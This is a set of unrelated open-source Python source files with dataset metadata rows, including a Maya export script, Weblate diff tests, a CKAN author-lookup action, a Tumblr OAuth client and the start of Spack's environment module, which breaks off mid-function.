'nombre': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'telefono': ('django.db.models.fields.CharField', [], {'max_length': '120', 'null': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'equipos.equipo': {
'Meta': {'object_name': 'Equipo'},
'complejo_id': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['complejos.Complejo']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'nombre': ('django.db.models.fields.CharField', [], {'max_length': '120'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['equipos'] | mit | -1,342,480,729,113,450,200 | 66.873563 | 195 | 0.558435 | false |
mortentoo/maya | scripts/animvr/export_obj_sequence.py | 1 | 1035 | import pymel.core as pm
class ExportObjSequence:
def __init__(self):
self.objects = []
self.start_frame = None
self.end_frame = None
def export(self):
if not pm.ls(sl=True):
pm.warning("No objects selected")
return
path = pm.fileDialog2(fileFilter="*.obj", dialogStyle=2, fileMode=0,
dir=pm.workspace.path)
if not path:
return
path = path[0]
for f in range(self.start_frame, self.end_frame + 1):
frame_path = ('%s_%04d.obj' % (path[:-4], f))
print frame_path
pm.currentTime(f)
pm.exportSelected(frame_path, force=True, options="groups=1;ptgroups=1;materials=0;smoothing=1;normals=1",
typ="OBJexport", preserveReferences=False, exportSelected=True)
if __name__ == '__main__':
eos = ExportObjSequence()
eos.start_frame = 1
eos.end_frame = 72
eos.export()
| gpl-3.0 | -4,551,239,341,659,585,500 | 27.75 | 118 | 0.523671 | false |
patrick-winter-knime/mol-struct-nets | molstructnets/steps/prediction/tensor2d/tensor_2d.py | 1 | 3072 | import h5py
from keras import models
import numpy
from steps.prediction.shared.tensor2d import prediction_array
from util import data_validation, file_structure, progressbar, logger, file_util, hdf5_util, misc
class Tensor2D:
@staticmethod
def get_id():
return 'tensor_2d'
@staticmethod
def get_name():
return 'Network (Grid)'
@staticmethod
def get_parameters():
parameters = list()
parameters.append({'id': 'batch_size', 'name': 'Batch Size', 'type': int, 'default': 100, 'min': 1,
'description': 'Number of data points that will be processed together. A higher number leads'
' to faster processing but needs more memory. Default: 100'})
parameters.append({'id': 'number_predictions', 'name': 'Predictions per data point', 'type': int, 'default': 1,
'min': 1, 'description': 'The number of times a data point is predicted (with different'
' transformations). The result is the mean of all predictions. Default: 1'})
return parameters
@staticmethod
def check_prerequisites(global_parameters, local_parameters):
data_validation.validate_preprocessed_specs(global_parameters)
data_validation.validate_network(global_parameters)
@staticmethod
def execute(global_parameters, local_parameters):
prediction_path = file_structure.get_prediction_file(global_parameters)
if file_util.file_exists(prediction_path):
logger.log('Skipping step: ' + prediction_path + ' already exists')
else:
array = prediction_array.PredictionArrays(global_parameters, local_parameters['batch_size'],
transformations=local_parameters['number_predictions'])
predictions = numpy.zeros((len(array.input), 2))
temp_prediction_path = file_util.get_temporary_file_path('tensor_prediction')
model_path = file_structure.get_network_file(global_parameters)
model = models.load_model(model_path)
logger.log('Predicting data')
chunks = misc.chunk_by_size(len(array.input), local_parameters['batch_size'])
with progressbar.ProgressBar(len(array.input) * local_parameters['number_predictions']) as progress:
for iteration in range(local_parameters['number_predictions']):
for chunk in chunks:
predictions[chunk['start']:chunk['end']] += model.predict(array.input.next())[:]
progress.increment(chunk['size'])
predictions /= local_parameters['number_predictions']
array.close()
prediction_h5 = h5py.File(temp_prediction_path, 'w')
hdf5_util.create_dataset_from_data(prediction_h5, file_structure.Predictions.prediction, predictions)
prediction_h5.close()
file_util.move_file(temp_prediction_path, prediction_path)
| gpl-3.0 | -7,248,230,788,257,675,000 | 51.067797 | 128 | 0.623372 | false |
tomicic/ModelMMORPG | sc.py | 1 | 3434 | #!/usr/bin/env python
#-*- coding: utf-8 -*-
from spade.Agent import BDIAgent
from spade.Behaviour import OneShotBehaviour, EventBehaviour, ACLTemplate, MessageTemplate
from spade.ACLMessage import ACLMessage
from spade.AID import aid
from spade.SWIKB import SWIKB as KB
Overflow = 0.00
'''
TODO:
Reimplement agents and their behaviours as in SSSHS, but add organizational units, see:
https://github.com/javipalanca/spade/blob/master/spade/Organization.py
https://github.com/javipalanca/spade/blob/master/spade/Organization_new.py
Implement communication via messaging.
Store data about agents state in knowledge base.
'''
class Report( OneShotBehaviour ):
''' Reporting behaviour to be added on the fly at the end of simulation with addBehaviour() '''
def _process( self ):
''' Print out the stats of all storages '''
''' TODO: Would be nice to produce some visualization on this '''
with self.myAgent:
totalInterventions = economyRequests + delayRequests + restoreEconomyRequests + advanceRequests + giveRequests + negotiationRequests
global Overflow
for s in storages:
Overflow += s.ResourceLoss
say( ".... [ END OF SIMULATION ] ...." )
say( "******* Number of system interventions: %d" % totalInterventions )
say( "*********** First intervention happened at time: %d" % firstIntervention )
say( "******* Number of LT ALERTS: %d" % LTalerts )
say( "*********** Number of DELAY requests: %d" % delayRequests )
say( "*********** Number of ECONOMY requests: %d" % economyRequests )
say( "*********** Number of NEGOTIATION requests: %d" % negotiationRequests )
say( "******* Number of UT ALERTS: %d" % UTalerts )
say( "*********** Number of RESTORE requests: %d" % restoreEconomyRequests )
say( "*********** Number of ADVANCE requests: %d" % advanceRequests )
say( "*********** Number of GIVE requests: %d" % giveRequests )
say( "*********** Overflow of resources: %f" % Overflow )
for s in storages:
say( "INDIVIDUAL REPORT FOR STORAGE %s" % s.name )
say( "- Capacity: %d" % s.maxCapacity )
say( "- CRL: %d" % s.currentResourceLevel )
say( "- UT alerts: %d" % s.myUTalerts )
say( "- Advance reqs: %d" % s.myAdvanceReqs )
say( "- Resources lost: %f" % s.ResourceLoss )
say( "- LT alerts: %d" % s.myLTalerts )
say( "- Economy reqs: %d" % s.myEconomyReqs )
say( "- Delay reqs: %d" % s.myDelayReqs )
say( "CRL HISTORY: %s" % s.CRLhistory )
say( "OVERFLOW per time unit: %s" % s.overflowHistory )
class TalkingAgent( BDIAgent ):
''' Agent that prints to the console
Abstract - only to be inherited by other agent classes
'''
def say( self, msg ):
''' Say something (e.g. print to console for debug purposes) '''
print '%s: %s' % ( self.name.split( '@' )[ 0 ], str( msg ) )
class Observer( TalkingAgent ):
''' Observer agent -- collects statstical data about all other agents '''
def _setup( self ):
''' Setup the agent's knowledge base '''
self.kb = KB()
self.report = Report()
class Storage( TalkingAgent ):
''' A storage in a settlement '''
def _setup( self ):
pass
class Consumer( TalkingAgent ):
''' A consumer in a settlement '''
def _setup( self ):
pass
class Producer( TalkingAgent ):
''' A producer in a settlement '''
def _setup( self ):
pass
if __name__ == '__main__':
''' Add simulation configuration here (e.g. number of agents, organizational units, hierarchy'''
pass
| gpl-3.0 | 5,696,110,524,052,965,000 | 33.686869 | 135 | 0.655213 | false |
lem9/weblate | weblate/trans/tests/test_diff.py | 1 | 2571 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2017 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from unittest import TestCase
from weblate.trans.simplediff import html_diff
from weblate.trans.templatetags.translations import format_translation
from weblate.trans.tests.test_checks import MockUnit, MockLanguage
class DiffTest(TestCase):
"""Testing of HTML diff function."""
def test_same(self):
self.assertEqual(
html_diff('first text', 'first text'),
'first text'
)
def test_add(self):
self.assertEqual(
html_diff('first text', 'first new text'),
'first <ins>new </ins>text'
)
def test_unicode(self):
self.assertEqual(
html_diff('zkouška text', 'zkouška nový text'),
'zkouška <ins>nový </ins>text'
)
def test_remove(self):
self.assertEqual(
html_diff('first old text', 'first text'),
'first <del>old </del>text'
)
def test_replace(self):
self.assertEqual(
html_diff('first old text', 'first new text'),
'first <del>old</del><ins>new</ins> text'
)
def test_format_diff(self):
unit = MockUnit(source='Hello word!')
self.assertEqual(
format_translation(
unit.source,
unit.translation.subproject.project.source_language,
diff='Hello world!',
)['items'][0]['content'],
'Hello wor<del>l</del>d!'
)
def test_fmtsearchmatch(self):
self.assertEqual(
format_translation(
'Hello world!',
MockLanguage('en'),
search_match='hello'
)['items'][0]['content'],
'<span class="hlmatch">Hello</span> world!'
)
| gpl-3.0 | 1,324,236,150,092,939,800 | 31.443038 | 72 | 0.608272 | false |
EnviDat/ckanext-envidat_theme | ckanext/envidat_theme/action.py | 1 | 3448 | # coding: utf8
from ckan.logic import side_effect_free
from ckan.logic.action.get import user_show
import ckan.plugins.toolkit as toolkit
from ckanext.passwordless import util
import json
from xml.etree import ElementTree
import requests
from logging import getLogger
log = getLogger(__name__)
@side_effect_free
def context_user_show(context, data_dict):
user = envidat_get_user_from_context(context)
if user:
return {'user': user}
else:
return {}
@side_effect_free
def envidat_get_author_data(context, data_dict):
user_data = get_author_data(context, data_dict)
return user_data
def envidat_get_user_from_context(context):
auth_user_obj = context.get('auth_user_obj', None)
if auth_user_obj:
auth_user_obj_dict = auth_user_obj.as_dict()
user_data = user_show(context, {'id': auth_user_obj_dict['id']})
auth_user_obj_dict["email_hash"] = user_data["email_hash"]
# renew the master key
apikey = util.renew_master_token(auth_user_obj_dict['name'])
auth_user_obj_dict["apikey"] = apikey
return auth_user_obj_dict
else:
return {}
def get_author_data(context, data_dict):
context['ignore_auth'] = True
email = data_dict.get('email', '').strip().lower()
if email:
try:
search_results = toolkit.get_action(
'package_search')(
context,
{'q': 'author:\"' + email + '\"',
'sort': 'metadata_modified desc'}
)
except Exception as e:
log.error("exception {0}".format(e))
return {}
author_data = {}
if search_results.get('count', 0) > 0:
author_data_list = []
for dataset in search_results.get('results', []):
author_data_list += [a for a in json.loads(dataset.get('author'))
if a.get('email', '').strip().lower() == email]
# copy dictionary field by field including empty fields
author_data = {}
if author_data_list:
for k, v in author_data_list[0].items():
if v and len(v) > 0:
author_data[k] = "{0}".format(v).strip()
else:
author_data[k] = ""
# fill up empty fields from older datasets
for author in author_data_list:
for k, v in author.items():
if not author_data.get(k) or (len(author_data.get(k, "")) < 1):
# TODO skip affiliation
author_data[k] = "{0}".format(v).strip()
# TODO check if the orcid is empty request from ORCID API
# https://www.envidat.ch/orcid/search/?q=email:*@wsl.ch
if not author_data.get('identifier'):
author_data['identifier'] = get_orcid_id(email)
return author_data
return {}
def get_orcid_id(email):
try:
api_call = 'https://www.envidat.ch/orcid/search/?q=email:{0}'.format(email)
req = requests.get(api_call)
root = ElementTree.fromstring(req.content)
path = root.find(".//{http://www.orcid.org/ns/common}path")
orcid_id = path.text
return orcid_id
except AttributeError:
return ''
except Exception as e:
log.error('Failed to get orcid_id: {0}'.format(e))
return ''
| agpl-3.0 | -2,467,828,462,179,743,000 | 27.262295 | 84 | 0.555394 | false |
rbarlow/pulp_python | plugins/test/unit/plugins/importers/test_importer.py | 1 | 7890 | """
Contains tests for pulp_python.plugins.importers.importer.
"""
from gettext import gettext as _
import unittest
import mock
from pulp_python.common import constants
from pulp_python.plugins import models
from pulp_python.plugins.importers import importer
class TestEntryPoint(unittest.TestCase):
"""
Tests for the entry_point() function.
"""
def test_return_value(self):
"""
Assert the correct return value for the entry_point() function.
"""
return_value = importer.entry_point()
expected_value = (importer.PythonImporter, {})
self.assertEqual(return_value, expected_value)
class TestPythonImporter(unittest.TestCase):
"""
This class contains tests for the PythonImporter class.
"""
@mock.patch('pulp.server.controllers.repository.get_unit_model_querysets', spec_set=True)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
def test_import_units_units_none(self, mock_associate, mock_get):
"""
Assert correct behavior when units == None.
"""
python_importer = importer.PythonImporter()
dest_repo = mock.MagicMock()
source_repo = mock.MagicMock()
units = ['unit_a', 'unit_b', 'unit_3']
mock_get.return_value = [units]
imported_units = python_importer.import_units(source_repo, dest_repo, mock.MagicMock(),
mock.MagicMock(), units=None)
mock_get.assert_called_once_with(source_repo.repo_obj.repo_id, models.Package)
# Assert that the units were associated correctly
associate_unit_call_args = [c[1] for c in mock_associate.mock_calls]
self.assertEqual(associate_unit_call_args, [(dest_repo.repo_obj, u) for u in units])
# Assert that the units were returned
self.assertEqual(imported_units, units)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
def test_import_units_units_not_none(self, mock_associate):
"""
Assert correct behavior when units != None.
"""
python_importer = importer.PythonImporter()
dest_repo = mock.MagicMock()
units = ['unit_a', 'unit_b', 'unit_3']
imported_units = python_importer.import_units(mock.MagicMock(), dest_repo, mock.MagicMock(),
mock.MagicMock(), units=units)
# Assert that the units were associated correctly
associate_unit_call_args = [c[1] for c in mock_associate.mock_calls]
self.assertEqual(associate_unit_call_args, [(dest_repo.repo_obj, u) for u in units])
# Assert that the units were returned
self.assertEqual(imported_units, units)
def test_metadata(self):
"""
Test the metadata class method's return value.
"""
metadata = importer.PythonImporter.metadata()
expected_value = {
'id': constants.IMPORTER_TYPE_ID, 'display_name': _('Python Importer'),
'types': [constants.PACKAGE_TYPE_ID]}
self.assertEqual(metadata, expected_value)
@mock.patch('pulp_python.plugins.importers.importer.shutil.rmtree')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.__init__')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.sync')
@mock.patch('pulp_python.plugins.importers.importer.tempfile.mkdtemp')
def test_sync_repo_failure(self, mkdtemp, sync, __init__, rmtree):
"""
Test the sync_repo() method when the sync fails.
"""
config = mock.MagicMock()
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
sync_conduit = mock.MagicMock()
# Fake the sync raising some bogus error
sync.side_effect = IOError('I/O error, lol!')
__init__.return_value = None
try:
python_importer.sync_repo(repo, sync_conduit, config)
except IOError as e:
# Make sure the error was passed on as it should have been
self.assertEqual(str(e), 'I/O error, lol!')
# A temporary working dir should have been created in the repo's working dir
mkdtemp.assert_called_once_with(dir=repo.working_dir)
# No matter what happens, it's important that we cleaned up the temporary dir
rmtree.assert_called_once_with(mkdtemp.return_value, ignore_errors=True)
# Make sure the SyncStep was initialized correctly
__init__.assert_called_once_with(repo=repo, conduit=sync_conduit, config=config,
working_dir=mkdtemp.return_value)
# Make sure all the right args were passed on to sync()
sync.assert_called_once_with()
@mock.patch('pulp_python.plugins.importers.importer.shutil.rmtree')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.__init__')
@mock.patch('pulp_python.plugins.importers.importer.sync.SyncStep.sync')
@mock.patch('pulp_python.plugins.importers.importer.tempfile.mkdtemp')
def test_sync_repo_success(self, mkdtemp, sync, __init__, rmtree):
"""
Test the sync_repo() method when the sync is successful.
"""
config = mock.MagicMock()
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
sync_conduit = mock.MagicMock()
sync_report = mock.MagicMock()
sync.return_value = sync_report
__init__.return_value = None
return_value = python_importer.sync_repo(repo, sync_conduit, config)
# A temporary working dir should have been created in the repo's working dir
mkdtemp.assert_called_once_with(dir=repo.working_dir)
# No matter what happens, it's important that we cleaned up the temporary dir
rmtree.assert_called_once_with(mkdtemp.return_value, ignore_errors=True)
# Make sure the SyncStep was initialized correctly
__init__.assert_called_once_with(repo=repo, conduit=sync_conduit, config=config,
working_dir=mkdtemp.return_value)
# Make sure all the right args were passed on to sync()
sync.assert_called_once_with()
# And, of course, assert that the sync report was returned
self.assertEqual(return_value, sync_report)
@mock.patch('pulp.server.controllers.repository.rebuild_content_unit_counts', spec_set=True)
@mock.patch('pulp.server.controllers.repository.associate_single_unit', spec_set=True)
@mock.patch('pulp_python.plugins.models.Package.from_archive')
def test_upload_unit(self, from_archive, mock_associate, mock_rebuild):
"""
Assert correct operation of upload_unit().
"""
package = from_archive.return_value
python_importer = importer.PythonImporter()
repo = mock.MagicMock()
type_id = constants.PACKAGE_TYPE_ID
unit_key = {}
metadata = {}
file_path = '/some/path/1234'
conduit = mock.MagicMock()
config = {}
report = python_importer.upload_unit(repo, type_id, unit_key, metadata, file_path, conduit,
config)
self.assertEqual(report, {'success_flag': True, 'summary': {}, 'details': {}})
from_archive.assert_called_once_with(file_path)
package.save_and_import_content.assert_called_once_with(file_path)
mock_associate.assert_called_once_with(repo.repo_obj, package)
def test_validate_config(self):
"""
There is no config, so we'll just assert that validation passes.
"""
python_importer = importer.PythonImporter()
return_value = python_importer.validate_config(mock.MagicMock(), {})
expected_value = (True, '')
self.assertEqual(return_value, expected_value)
| gpl-2.0 | -8,726,490,154,107,941,000 | 42.833333 | 100 | 0.641825 | false |
Aiacos/DevPyLib | mayaLib/guiLib/base/baseUI.py | 1 | 6497 | __author__ = 'Lorenzo Argentieri'
import inspect
import ast
import mayaLib.pipelineLib.utility.docs as doc
from PySide2 import QtCore, QtWidgets
import pymel.core as pm
def test(a, b, c, d='ciao', e='stronzo', f=1):
"""
Test Function
:param a:
:param b:
:param c:
:param d:
:param e:
:param f:
:return:
"""
print a, b, c, d, e, f
class Prova():
def __init__(self, ciccia, pupu=2048):
print 'Questa e una prova'
def motodo(self):
print 'test method'
class FunctionUI(QtWidgets.QWidget):
def __init__(self, func, parent=None):
super(FunctionUI, self).__init__(parent)
self.function = func
if inspect.isclass(func):
self.sig = inspect.getargspec(func.__init__)
else:
self.sig = inspect.getargspec(func)
self.layout = QtWidgets.QGridLayout()
self.args = self.getParameterList()
self.label_list = []
self.lineedit_list = []
self.fillButton_list = []
row = 0
for arg in self.args:
if arg[0] != 'self':
labelname = QtWidgets.QLabel(arg[0])
if arg[1] != None:
if isinstance(arg[1], bool):
lineedit = QtWidgets.QCheckBox('')
lineedit.setChecked(arg[1])
else:
lineedit = QtWidgets.QLineEdit(str(arg[1]))
fillButton = QtWidgets.QPushButton(">")
else:
lineedit = QtWidgets.QLineEdit("")
fillButton = QtWidgets.QPushButton(">")
self.layout.addWidget(labelname, row, 0)
self.label_list.append(labelname)
if fillButton:
self.layout.addWidget(fillButton, row, 1)
self.fillButton_list.append(fillButton)
self.layout.addWidget(lineedit, row, 2)
self.lineedit_list.append(lineedit)
row = row + 1
self.execButton = QtWidgets.QPushButton("Execute")
self.advancedCheckBox = QtWidgets.QCheckBox("Advanced")
self.advancedCheckBox.setChecked(False)
self.toggleDefaultParameter(False)
self.layout.addWidget(self.execButton, row, 2)
self.layout.addWidget(self.advancedCheckBox, row, 0)
self.doclabel = QtWidgets.QLabel(doc.getDocs(func))
self.layout.addWidget(self.doclabel, row + 1, 2)
self.setLayout(self.layout)
# self.connect(self.execButton, QtCore.Signal("clicked()"), self.execFunction) # Deprecated
self.execButton.clicked.connect(self.execFunction)
self.advancedCheckBox.stateChanged.connect(self.toggleDefaultParameter)
for button in self.fillButton_list:
button.clicked.connect(self.fillWithSelected)
self.setWindowTitle(func.__name__)
self.setWindowFlags(QtCore.Qt.WindowStaysOnTopHint)
self.setSizePolicy(QtWidgets.QSizePolicy.MinimumExpanding, QtWidgets.QSizePolicy.MinimumExpanding)
self.setFocus()
def fillWithSelected(self):
button = self.sender()
selection_list = pm.ls(sl=True)
index = self.fillButton_list.index(button)
lineedit = self.lineedit_list[index]
text_list = []
for item in selection_list:
text_list.append(str(item))
lineedit.setText(', '.join(text_list))
def getParameterList(self):
args = self.sig.args
if len(args) == 0:
return []
varargs = self.sig.varargs
keywords = self.sig.keywords
defaults = self.sig.defaults
if not defaults:
defaults = []
argspairs = []
argslen = len(args)
deflen = len(defaults)
counter = 0
defcount = 0
for arg in args:
if counter < (argslen - deflen):
defval = None
else:
defval = defaults[defcount]
defcount = defcount + 1
counter = counter + 1
pair = [arg, defval]
argspairs.append(pair)
return argspairs
# SLOTS
def toggleDefaultParameter(self, defaultvisible=False):
counter = 0
for arg in self.args:
if arg[0] != 'self':
if defaultvisible:
# show
if arg[1] != None:
self.label_list[counter].show()
self.lineedit_list[counter].show()
self.fillButton_list[counter].show()
else:
# hide
if arg[1] != None:
self.label_list[counter].hide()
self.lineedit_list[counter].hide()
self.fillButton_list[counter].hide()
counter = counter + 1
def execFunction(self):
param_list = []
for param in self.lineedit_list:
value = param.text()
if isinstance(param, QtWidgets.QCheckBox):
if param.isChecked():
qCheckBoxValue = True
else:
qCheckBoxValue = False
value = qCheckBoxValue
param_list.append(value)
elif '[' in value and ']' in value:
value = value.replace('[', '').replace(']', '').replace("'", "").replace(' ', '').split(',')
param_list.append(value)
elif value.replace('.', '', 1).isdigit():
value = ast.literal_eval(value)
param_list.append(value)
elif value == 'True':
value = True
param_list.append(value)
elif value == 'False':
value = False
param_list.append(value)
elif value == '':
value = None
param_list.append(value)
elif ', ' in value:
value = value.split(', ')
param_list.append(value)
else:
param_list.append(value)
self.wrapper(param_list)
def wrapper(self, args):
self.function(*args)
if __name__ == "__main__":
# app = QtWidgets.QApplication.instance()
# button = QtWidgets.QPushButton("Hello World")
# button.show()
# app.exec_()
#print inspect.getargspec(Prova)
t = FunctionUI(Prova)
t.show()
| agpl-3.0 | -574,755,296,216,365,000 | 29.502347 | 108 | 0.52732 | false |
marco-lancini/Showcase | app_socialnetworks/tumblr.py | 1 | 7041 | from __init__ import *
from oauthclient import *
class TumblrClient(OauthClient):
"""
Wrapper for Tumblr APIs
:CONSUMER_KEY: Tumblr App ID
:CONSUMER_SECRET: Tumblr API Secret
:blog: the connected Tumblr blog, if any
:user_auth: account of the user on Showcase
:auth: boolean flag (if True, the operation needs to be authenticated)
.. seealso:: :class:`app_socialnetworks.oauthclient.OauthClient`
"""
CONSUMER_KEY = setting('TUMBLR_CONSUMER_KEY')
CONSUMER_SECRET = setting('TUMBLR_CONSUMER_SECRET')
request_token_url = 'http://www.tumblr.com/oauth/request_token'
authorize_url = 'http://www.tumblr.com/oauth/authorize'
access_token_url = 'http://www.tumblr.com/oauth/access_token'
def __init__(self, blog, user_auth=False, auth=False):
"""
Insantiate the client: if authentication is needed, proceed with Oauth; otherwise, use a simple HTTP client
:param blog: the connected Tumblr blog, if any
:type blog: string
:param user_auth: account of the user on Showcase
:type user_auth: `User`
:param auth: flag (if True, the operation needs to be authenticated)
:type auth: boolean
"""
self.blog = blog
self.user_auth = user_auth
self.auth = auth
if self.auth:
# Authentication needed, proceed with Oauth
super(TumblrClient, self).__init__(self.CONSUMER_KEY, self.CONSUMER_SECRET)
else:
# Use a simple HTTP client
self.client = httplib2.Http()
def request_token(self, consumer):
"""
Retrieve the access token of the user from his connected accounts data
"""
# Retrieve connected accounts
connected_accounts = self.user_auth.social_auth.filter(user=self.user_auth.id).filter(provider="tumblr")
if len(connected_accounts) == 0:
raise NotConnectedException('Not Connected to Tumblr')
# Retrieve access_token from socialauth
access_token = connected_accounts[0].extra_data['access_token']
access_token = urlparse.parse_qs(access_token)
oauth_token = access_token['oauth_token'][0]
oauth_token_secret = access_token['oauth_token_secret'][0]
return oauth_token, oauth_token_secret
#=========================================================================
# READ
#=========================================================================
def _query(self, method, optionals=None):
"""
Execute a read-only query
"""
url = "http://api.tumblr.com/v2/blog/%s.tumblr.com/%s?api_key=%s" % (self.blog, method, self.CONSUMER_KEY)
if optionals:
url += optionals
try:
resp, content = self.client.request(url, "GET")
content = json.loads(content)['response']
return content
except:
return None
def get_blog_info(self):
"""
Get general infos about the connected blog
"""
method = "info"
return self._query(method)
def get_blog_posts(self):
"""
Fetch last 5 blog posts
"""
method = "posts"
optionals = "&limit=5"
posts = self._query(method, optionals)
if posts:
posts = posts['posts']
for p in posts:
temp = datetime.strptime(p['date'], "%Y-%m-%d %H:%M:%S GMT")
p['date'] = temp.strftime("%d %B %Y")
return posts
else:
return None
#=========================================================================
# WRITE
#=========================================================================
def _post_blog(self, params, media=None):
"""
Execute a write query
"""
url = 'http://api.tumblr.com/v2/blog/%s.tumblr.com/post' % self.blog
if media:
content = self._postOAuth(url, params)
content = content.read()
else:
body = urllib.urlencode(params)
resp, content = self.client.request(url, "POST", body=body)
# Check response
content = json.loads(content)
response = content['meta']['msg']
if response:
if response != 'Created':
if response == 'Not Authorized':
raise ClearanceException("Not an owned blog")
else:
raise UploadException("Error During Upload: %s" % response)
else:
raise UploadException("Error During Upload: %s" % response)
def add_text(self, title, body):
"""
Add a blog of type: *text*
:param title: title of the blog post
:type title: string
:param body: content of the blog post
:type body: string
"""
params = {'type': 'text', 'title': title, 'body': body}
return self._post_blog(params)
def add_link(self, title, url):
"""
Add a blog of type: *link*
:param title: title of the blog post
:type title: string
:param url: url of the link to publish
:type url: string
"""
params = {'type': 'link', 'title': title, 'url': url}
return self._post_blog(params)
def add_quote(self, quote):
"""
Add a blog of type: *quote*
:param quote: quote to publish
:type quote: string
"""
params = {'type': 'quote', 'quote': quote}
return self._post_blog(params)
def add_chat(self, title, conversation):
"""
Add a blog of type: *chat*
:param title: title of the blog post
:type title: string
:param conversation: conversation to publish
:type conversation: string
"""
params = {'type': 'chat', 'title': title, 'conversation': conversation}
return self._post_blog(params)
def add_photo(self, source, photo):
"""
Add a blog of type: *photo*
:param source: url of the photo to publish, if any
:type source: string
:param photo: photo to upload, if any
:type photo: image file
"""
if source:
params = {'type': 'photo', 'source': source}
return self._post_blog(params)
elif photo:
params = {'type': 'photo', 'data[0]': photo.read()}
return self._post_blog(params, media=True)
def add_audio(self, source):
"""
Add a blog of type: *audio*
:param source: url of the audio file to publish
:type source: string
"""
if source:
params = {'type': 'audio', 'external_url': source}
return self._post_blog(params)
# def add_video(self, video):
# params = {'type': 'video', 'data[0]': video.read()}
# return self._post_blog(params, media=True)
| mit | -552,312,351,703,994,600 | 30.017621 | 115 | 0.530464 | false |
rspavel/spack | lib/spack/spack/environment.py | 1 | 68581 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import collections
import os
import re
import sys
import shutil
import copy
import socket
import six
from ordereddict_backport import OrderedDict
import llnl.util.filesystem as fs
import llnl.util.tty as tty
from llnl.util.tty.color import colorize
import spack.concretize
import spack.error
import spack.hash_types as ht
import spack.repo
import spack.schema.env
import spack.spec
import spack.store
import spack.util.spack_json as sjson
import spack.util.spack_yaml as syaml
import spack.config
import spack.user_environment as uenv
from spack.filesystem_view import YamlFilesystemView
import spack.util.environment
import spack.architecture as architecture
from spack.spec import Spec
from spack.spec_list import SpecList, InvalidSpecConstraintError
from spack.variant import UnknownVariantError
import spack.util.lock as lk
from spack.util.path import substitute_path_variables
#: environment variable used to indicate the active environment
spack_env_var = 'SPACK_ENV'
#: currently activated environment
_active_environment = None
#: path where environments are stored in the spack tree
env_path = os.path.join(spack.paths.var_path, 'environments')
#: Name of the input yaml file for an environment
manifest_name = 'spack.yaml'
#: Name of the input yaml file for an environment
lockfile_name = 'spack.lock'
#: Name of the directory where environments store repos, logs, views
env_subdir_name = '.spack-env'
#: default spack.yaml file to put in new environments
default_manifest_yaml = """\
# This is a Spack Environment file.
#
# It describes a set of packages to be installed, along with
# configuration settings.
spack:
# add package specs to the `specs` list
specs: []
view: true
"""
#: regex for validating enviroment names
valid_environment_name_re = r'^\w[\w-]*$'
#: version of the lockfile format. Must increase monotonically.
lockfile_format_version = 2
# Magic names
# The name of the standalone spec list in the manifest yaml
user_speclist_name = 'specs'
# The name of the default view (the view loaded on env.activate)
default_view_name = 'default'
# Default behavior to link all packages into views (vs. only root packages)
default_view_link = 'all'
def valid_env_name(name):
return re.match(valid_environment_name_re, name)
def validate_env_name(name):
if not valid_env_name(name):
raise ValueError((
"'%s': names must start with a letter, and only contain "
"letters, numbers, _, and -.") % name)
return name
def activate(
env, use_env_repo=False, add_view=True, shell='sh', prompt=None
):
"""Activate an environment.
To activate an environment, we add its configuration scope to the
existing Spack configuration, and we set active to the current
environment.
Arguments:
env (Environment): the environment to activate
use_env_repo (bool): use the packages exactly as they appear in the
environment's repository
add_view (bool): generate commands to add view to path variables
shell (string): One of `sh`, `csh`, `fish`.
prompt (string): string to add to the users prompt, or None
Returns:
cmds: Shell commands to activate environment.
TODO: environment to use the activated spack environment.
"""
global _active_environment
_active_environment = env
prepare_config_scope(_active_environment)
if use_env_repo:
spack.repo.path.put_first(_active_environment.repo)
tty.debug("Using environmennt '%s'" % _active_environment.name)
# Construct the commands to run
cmds = ''
if shell == 'csh':
# TODO: figure out how to make color work for csh
cmds += 'setenv SPACK_ENV %s;\n' % env.path
cmds += 'alias despacktivate "spack env deactivate";\n'
if prompt:
cmds += 'if (! $?SPACK_OLD_PROMPT ) '
cmds += 'setenv SPACK_OLD_PROMPT "${prompt}";\n'
cmds += 'set prompt="%s ${prompt}";\n' % prompt
elif shell == 'fish':
if os.getenv('TERM') and 'color' in os.getenv('TERM') and prompt:
prompt = colorize('@G{%s} ' % prompt, color=True)
cmds += 'set -gx SPACK_ENV %s;\n' % env.path
cmds += 'function despacktivate;\n'
cmds += ' spack env deactivate;\n'
cmds += 'end;\n'
#
